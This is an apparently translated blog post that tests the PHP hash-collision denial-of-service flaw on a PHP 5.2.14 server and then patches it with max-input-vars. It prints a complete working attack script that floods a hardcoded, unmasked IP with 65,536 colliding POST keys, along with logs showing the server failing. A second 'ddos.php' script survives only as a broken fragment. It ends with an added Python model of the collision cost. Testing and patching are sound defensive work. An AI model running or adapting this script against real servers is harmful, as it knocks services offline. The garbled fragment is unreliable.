PHP hash vulnerability: testing the PHP hash vulnerability and patching it

PHP hash vulnerability test environment:

IP: xx.xx.31.167, Nginx 0.8 + PHP 5.2.14, 4 CPUs.

I. Before patching:

# curl --head http://127.0.0.1

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 06 Jan 2012 06:10:09 GMT

Content-Type: text/html

Connection: keep-alive

X-Powered-By: PHP/5.2.14

PHP version 5.2.14, load 0

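Test *** code:

1) The dos.php script: pow(2,15) builds the hash-collision POST data

<?php

// Number of keys to send; every key is a multiple of $size
$size = pow(2, 16);

$array = array();

$argument = '';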

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "http://115.238.31.167/test.php");

for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {

#$array[$key] = 0;

$argument.="a[".$key."]=0&";

}

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS, $argument."1=1");

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

curl_setopt($ch, CURLOPT_TIMEOUT, '0');

curl_setopt($ch, CURLOPT_USERAGENT, 'API REQUEST(CURL)');

$return['result'] = curl_exec($ch);

$return['code'] = curl_getinfo($ch, CURLINFO_HTTP_CODE);

curl_close($ch);

?>

Test with a single connection to http://xx.xx.31.167/dos.php?a=.1. Result: a single php-cgi process, with a single CPU at 100%.

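With two windows open making concurrent connections, there are two PHP processes, and two CPUs are both fully occupied at 100%.

2) The ddos.php script: PHP simulating the POST submission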

DDOS

for($i=0; $i<5; $i++){// number of concurrent requests

echo '';

}

?>

xx.xx.31.167 - - [06/Jan/2012:14:04:27 +0800] "POST /test.php HTTP/1.1" 502 191 "-" "API REQUEST(CURL)" "-"

xx.xx.194.180 - - [06/Jan/2012:14:04:27 +0800] "GET /test2.php HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17" "-"

xx.xx.31.167 - - [06/Jan/2012:14:05:26 +0800] "POST /test.php HTTP/1.1" 502 191 "-" "API REQUEST(CURL)" "-"

xx.xx.194.180 - - [06/Jan/2012:14:05:26 +0800] "GET /test2.php HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17" "-"

With PHP simulating the POST submission, all CPUs are instantly fully occupied at 100%.

II. Applying the patch

2. Steps:

# /usr/local/php/sbin/php-fpm stop  Stop the PHP service

# cd /tmp/php-5.2.14  Enter the source directory

# patch -p1 < ../php-5.2.14-max-input-vars.patch  Apply the patch

# ./configure --prefix=/usr/local/php --with-config-file-path=/usr/local/php/etc --with-mysql=/usr/local/mysql --with-mysqli=/usr/local/mysql/bin/mysql_config --with-iconv-dir=/usr/local --with-freetype-dir --with-jpeg-dir --with-png-dir --with-zlib --with-libxml-dir=/usr --enable-xml --disable-rpath --enable-discard-path --enable-safe-mode --enable-bcmath --enable-shmop --enable-sysvsem --enable-inline-optimization --with-curl --with-curlwrappers --enable-mbregex --enable-fastcgi --enable-fpm --enable-force-cgi-redirect --enable-mbstring --with-gd --enable-gd-native-ttf --with-mcrypt --with-openssl --with-mhash --enable-sockets --enable-pcntl --with-xmlrpc --enable-zip --enable-soap  Recompile

# make clean

# make ZEND_EXTRA_LIBS='-liconv'

# make install

Check whether the configuration file was overwritten by the install. Start the php-fpm service.

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 06 Jan 2012 08:05:38 GMT

Content-Type: text/html

Connection: keep-alive

X-Powered-By: PHP/5.2.14p1

The patch has been applied: 5.2.14p1

PHP hash *** test again:

Very effective; there is no longer any impact.
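
Why the max-input-vars patch takes the load away, as an added example (not code from the original post or from PHP): a Python model of a chained hash table that counts the comparisons needed to insert the page's keys, with and without a cap on the number of input variables. The function names and the fixed bucket count are assumptions of the model, and the limit of 1000 is the default of `max_input_vars` in upstream PHP, assumed here for the patch.

```python
# Added example: a model of a chained hash table indexed by `key & mask`.
# Assumptions: fixed bucket count (real tables grow by doubling) and
# integer keys used directly as the hash, as for PHP integer array keys.

MAX_INPUT_VARS = 1000  # default of max_input_vars in upstream PHP (assumed)


def colliding_keys(size):
    """Keys 0, size, 2*size, ... (the page's dos.php loop): all map to bucket 0."""
    return [i * size for i in range(size)]


def insert_cost(keys, table_size):
    """Insert keys and return how many chain nodes were compared in total."""
    mask = table_size - 1
    buckets = {}
    compared = 0
    for key in keys:
        chain = buckets.setdefault(key & mask, [])
        for existing in chain:  # an insert walks the chain looking for the key
            compared += 1
            if existing == key:
                break
        else:
            chain.append(key)  # not found: append at the end of the chain
    return compared


def cap_input_vars(keys, limit=MAX_INPUT_VARS):
    """Model of the patch: variables past the limit are not inserted."""
    return keys[:limit]


def compare(size):
    """Return (sequential, colliding, colliding_capped) comparison counts."""
    hostile = colliding_keys(size)
    return (
        insert_cost(range(size), size),
        insert_cost(hostile, size),
        insert_cost(cap_input_vars(hostile), size),
    )


if __name__ == "__main__":
    # 2**12 keeps the run short; the same formula n*(n-1)/2 gives
    # 2,147,450,880 comparisons for the page's 2**16 keys.
    print(compare(2 ** 12))
```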
